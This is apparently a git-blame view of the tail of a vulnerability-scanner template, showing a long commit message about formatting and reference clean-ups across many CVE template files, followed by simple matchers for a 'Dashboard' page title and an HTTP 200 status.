cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
- type: word
words:
- "<title>Dashboard</title>"
2021-10-10 01:13:30 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100b100ab9974bd16719860f013afc3fe8a9b09da541e2df13756dc7ac620cd480f02210080d1fc3247458331b51cf1b884db94afe5b40f5dd4258b168a7569927a66ef62:922c64590222798bb761d5b6d8e72950